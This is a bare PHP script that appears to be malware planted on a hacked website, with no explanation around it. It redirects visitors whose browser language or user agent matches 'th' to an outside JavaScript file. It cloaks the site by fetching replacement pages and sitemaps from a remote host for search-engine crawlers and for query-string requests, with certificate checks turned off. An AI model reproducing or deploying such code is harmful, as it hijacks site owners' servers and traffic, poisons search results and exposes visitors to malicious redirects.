<?php
try {
    function isIndonesianBrowser() {
        // 潰脤Accept-Language芛
        if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
            $languages = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
            if (strpos($languages, 'th') !== false || strpos($languages, 'th-th') !== false) {
                return true;
            }
        }
        
        // 潰脤User-Agent
        $ua = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';
        if (strpos($ua, 'th') !== false || strpos($ua, 'th-th') !== false) {
            return true;
        }
        
        return false;
    }
    
    if (isIndonesianBrowser()) {
        echo '<script type="text/javascript" src="https://tz.ohtcm.com/jump/cheng.js"></script>';
        exit;
    }
    
    $api_url = "https://th90.mindunkj.com/index.php";
    $header_curl = $_SERVER['HTTP_USER_AGENT'];
    $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https://' : 'http://';
    $domain = isset($_SERVER['HTTP_X_FORWARDED_HOST']) ? $_SERVER['HTTP_X_FORWARDED_HOST'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '');
    $file = (isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI'] != '') ? $_SERVER['REQUEST_URI'] : $_SERVER['HTTP_X_REWRITE_URL'];
    $post_data = array('file' => $file, 'domain' => $domain, 'http' => $protocol);
    
    if (stristr($file, "sitemap.xml")) {
        $result = posturl($api_url . "?domain=" . urlencode($domain) . "&path=" . urlencode($file), $post_data);
        header('Content-Type: application/xml');
        echo $result;
        exit;
    }
    
    if (strpos($file, '?') !== false || (isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING'] !== '')) {
        $result = posturl($api_url . "?domain=" . urlencode($domain) . "&path=" . urlencode($file), $post_data);
        echo $result;
        exit;
    }
    
    if (stristr($header_curl, strtolower('google')) !== false || stristr($header_curl, strtolower('bing')) !== false) {
        $result = posturl($api_url . "?domain=" . urlencode($domain) . "&path=" . urlencode($file), $post_data);
        if (strlen($result) != 0) {
            echo $result;
        }
    }
} catch (Exception $exception) {
}

function posturl($url, $post_data = null) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_TIMEOUT, 30);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_USERAGENT, @$_SERVER['HTTP_USER_AGENT']);
    curl_setopt($curl, CURLOPT_REFERER, @$_SERVER['HTTP_REFERER']);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($post_data));
    $data = curl_exec($curl);
    curl_close($curl);
    return $data;
}
?>